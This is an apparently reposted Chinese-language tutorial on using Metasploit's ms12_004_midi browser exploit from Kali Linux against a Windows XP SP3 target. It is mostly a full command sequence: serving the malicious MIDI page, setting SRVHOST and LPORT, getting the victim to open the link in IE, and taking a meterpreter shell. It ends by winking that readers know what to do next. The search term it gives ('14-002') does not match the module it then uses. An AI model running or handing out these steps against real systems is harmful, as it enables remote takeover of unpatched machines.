Metasploit之MIDI文件解析远程代码执行
1.认识Metasploit
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
2.准备
(1)Kali linux
(2)靶机 Win XP SP3
3.开始
■启动kali,使用命令行,输入msfconsole,进入metasploit终端控制台界面。
■输入search 14-002
use exploit/windows/browser/ms12_004_midi(利用该漏洞)
show options (查看选项)
set SRVHOST 192.168.150.130(设置本机ip)
exploit (生成地址)
set URIPATH /(伪装url) 再次exploit 发现4444端口占用 此时需修改
set LPORT 1234
再次 exploit 在靶机用ie浏览器访问生成的地址 http://192.168.150.130:8080/
监测到会话后 回车结束
输入sessions (查看会话)
sessions -i 1 (连接会话 1为Id值) 进入meterpreter 后输入shell
之后该干什么 你们懂的~~
注:可多次show options查看每一步配置时候正确
可以在命令行直接输入msfconsole -h 查看其它用途
可以在metasploit终端控制台输入-help查看msfconsole中的可用命令
可以在利用漏洞后输入show targets查看攻击平台
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
